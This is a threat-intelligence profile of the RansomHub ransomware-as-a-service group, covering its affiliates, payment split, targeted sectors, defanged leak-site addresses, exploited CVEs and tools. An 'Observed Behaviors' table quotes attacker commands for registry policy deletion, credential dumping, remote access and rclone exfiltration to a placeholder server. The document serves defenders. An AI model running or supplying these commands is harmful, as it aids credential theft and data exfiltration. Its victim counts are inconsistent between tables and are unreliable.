THREAT PROFILE :

Ransomhub Ransomware


Executive Summary

  • First Identified: 2024
  • Operation style: Ransomware-as-a-Service (RaaS)
  • Extortion method: Double extortion – combining the traditional ransomware extortion method (encryption) with exfiltration of victim’s sensitive data; the group threatens to leak the data via a data leak site if the ransom demand is not paid.
  • Most frequently targeted industries:
    • Industrials (Manufacturing)
    • Industrials (Construction & Engineering)
    • Consumer Cyclicals (Retail)
  • Most frequently targeted victim HQ region: North America

Description

Ransomhub is a ransomware-as-a-service (RaaS) operation that was first identified in February 2024. The group has been assessed to be related to the Alphv ransomware group, likely due to multiple former Alphv affiliates being observed using the Ransomhub ransomware. Additionally, security researchers with Symantec reported that the Ransomhub and Knight ransomware operations share significant overlap of code. The overlap has been assessed to likely be due to the Knight ransomware source code being sold on cybercriminal forums after the Knight operators halted operations.

Ransomhub is written in Golang and C++, according to a dark-web post. The malware is obfuscated using abstract syntax tree (AST) and built daily, with operators taking a 10% commission from affiliates in the RaaS model.

Initial Access Methods

Ransomhub initial access methods likely vary depending on the affiliate deploying the ransomware, including phishing, vulnerability exploitation, and initial access malware.

Payment Model

Ransomhub affiliates are allowed to keep 90% of ransom payments, with the core group taking a 10% commission. Affiliates are prohibited from targeting organizations that have previously paid a ransom demand and non-profit organizations.


Previous Targets

Previous Industry Targets (01 Feb 2024 to 31 Mar 2025)

  • Construction & Engineering: 95
  • Manufacturing: 101
  • Transportation: 19
  • Other: 21

Previous Victim HQ Regions (01 Feb 2024 to 31 Mar 2025)

  • North America: 439
  • South America: 156
  • Europe: 87
  • Asia: 51
  • Africa: 22
  • Oceania: 15

Data Leak Site

hxxp://ransomxifxwc5eteopdobynonjctkxxvap77yqifu2emfbecgbqdw6qd[.onion]
hxxp://fpwwt67hm3mkt6hdavkfyqi42oo3vkaggvjj4kxdr2ivsbzyka5yr2qd[.onion]
hxxp://ransomgxjnwmu5ceqwo2jrjssxpoicolmgismfpnslaixg3pgpe5qcad[.onion]
hxxp://mjmru3yz65o5szsp4rmkmh4adlezcpy5tqjjc4y5z6lozk3nnz2da2ad[.onion]
hxxp://an2ce4pqpf2ipvba2djurxi5pnxxhu3uo7ackul6eafcundqtly7bhid[.onion]


Known Exploited Vulnerabilities

Vulnerability Description Product Affected CVSS
CVE-2017-0144 RCE Vulnerability Microsoft SMBv1 8.1
CVE-2020-0787 Improper Privilege Management Vulnerability Microsoft Windows Background Intelligent Transfer Service(BITS) 7.8
CVE-2022-24521 Privilege Escalation Vulnerability Windows Log File System Driver 7.8
CVE-2022-42475 Heap-Based Buffer Overflow Vulnerability Fortinet FortiOS 9.8
CVE-2023-22515 Broken Access Control Vulnerability Atlassian Confluence Data Center and Server 9.8
CVE-2023-27532 Missing Authentication for Critical Function Vulnerability Veeam Backup&Replication Cloud Connect 7.5
CVE-2023-27997 Heap-Based Overflow Vulnerability Fortinet FortiOS 9.8
CVE-2023-3519 RCE Vulnerability Citrix NetScaler ADC and NetScaler Gateway 9.8
CVE-2023-46604 Deserialization of Untrusted Data Vulnerability Apache ActiveMQ 9.8
CVE-2023-46747 Authentication Bypass Vulnerability F5 BIG-IP Configuration Utility 9.8

Associations

  • Koley: The user profile on RAMP, a cybercriminal forum, that has previously advertised the Ransomhub RaaS operation.
  • Notchy: A former Alphv ransomware affiliate working with Ransomhub.
  • Alphv Ransomware: The Ransomhub’s encryptor has similarities to the Alphv encryptor.
  • DragonForce Ransomware: Mixed reports exist regarding the relationship between Ransomhub and DragonForce, indicating potential merger or exit scam.

Known Tools

Tool Description
Advanced Port Scanner Free network scanner to find open ports.
Amazon S3 Buckets Service that offers object storage.
Google Voice VoIP server used for phishing phone calls.
Mimikatz Open-source application used to view and save authentication credentials
TightVNC Remote desktop software allowing access to computers over the network.

Observed Behaviors

Windows

Tactic Commands Observed
Defense Evasion reg delete “HKLM\Software\Microsoft\Windows\CurrentVersion\PColicies” /f
Credential Access C:\Windows\System32\cmd.exe /C C:\Downloads\232.bat \Temp\sass.DMP
Discovery Process32FirstW() API
Command and Control C:\Windows\system32\cmd.exe /c C:\ProgramData\AnyDesk.exe
Exfiltration rclone copy \i$ <REMOTE_SERVER>: \Users --include ".pdf"

Execution Options

Windows Execution Options

Execution Option Description
-cmd string Execute a specific command before encryption.
-disable-net Disable network interfaces before starting encryption.
-fast Enable fast encryption mode.

References

Agat (2024, April 04) Fortinet: “Threat Coverage: How FortiEDR protects against RansomHub Ransomware.” FortiEDR
Aitoriyev, Abzal; Tykushin, Anatoly (2024, August 28) Group-IB: “Ransomhub ransomware-as-a-service.” Group-IB
Avanzato, Joseph (2025, April 10) Varonis: “RansomHub-What You Need to Know About the Rapidly Emerging Threat.” Varonis
CISA (2024, August 29) “#StopRansomware: RansomHub Ransomware.” CISA
DarkTrace (2025, January 14) “RansomHub Ransomware: Darktrace’s Investigation of the Newest Tool in ShadowSyndicate's Arsenal.” DarkTrace